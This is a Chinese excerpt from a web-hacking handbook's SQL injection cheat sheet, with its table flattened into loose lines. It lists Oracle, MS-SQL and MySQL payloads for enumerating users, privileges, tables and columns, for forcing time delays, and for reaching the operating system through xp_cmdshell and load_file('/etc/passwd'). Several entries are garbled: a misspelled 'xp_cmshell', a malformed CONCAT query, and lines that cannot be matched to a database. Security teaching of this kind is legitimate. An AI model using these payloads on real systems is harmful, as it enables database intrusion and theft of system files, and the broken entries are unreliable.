摘自:《The Web Application Hacker's Handbook》

中文名:《******技术宝典Web实战篇》(第二版)




Oracle
MS-SQL
MySQL
ASCII和substring

ASCII('A') 

SUBSTR('ABCDE',2,3)

ASCII('A') 

SUBSTRING('ABCDE',2,3)

ASCII('A') 

SUBSTRING('ABCDE',2,3)

获取当前数据库用户

Select Sys.login_user from dual

SELECT user FROM dual

SYS_CONTEXT('USERENV','SESSION_USER')

select suser_sname()
SELECT user()
引起时间延迟

Utl_Http.request('http://xx.com')

waitfor delay '0:0:10' exec master..xp_cmdshell 'ping localhost'
sleep(100)
获取数据库版本
select banner from v$version
select @@version
select @@version
获取当前数据库
SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual

select db_name()

获取服务器名:

select @@servername

Select database()
获取当前用户权限
SELECT privilege FROM session_privs
SELECT grantee,table_name,privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
SELECT * FROM information_schema.user_privileges WHERE grantee='[user]' 此处[user]由SELECT user()的输入决定
显示所有表和列

Select table_name||'

'||column_name from all_tab_columns

SELECT table_name+'

',column_name from information_schema.columns

SELECT CONCAT+'

',column_name from information_schema.columns
显示用户对象
Select object_name,object_type from user_objects
SELECT name FROM sysobjects
SELECT table_name FROM information_schema.tables(或trigger_name from information_schema.triggers等)
显示用户表
Select object_name,object_type from user_objects WHERE object_type='TABLE'或者显示用户访问的所有表:SELECT table_name FROM all_tables
SELECT name FROM sysobjects WHERE xtype='U'
SELECT table_name FROM information_schema.tables where table_type='BASE TABLE' and table_schema!='mysql'
显示表foo的列名
Select column_name,Name from user_tab_columns where table_name='foo'如果目标数据不为当前应用程序用户所有,使用ALL_table_columns表
SELECT column_name FROM information_schema.columns WHERE table_name='foo'
SELECT column_name FROM information_schema.columns WHERE table_name='foo'
与操作系统交互(最简单的方式)
请参考David Litchfield所著的The Oracle Hacker's Handbook一书
exec xp_cmshell 'dir c:\'
select load_file ('/etc/passwd')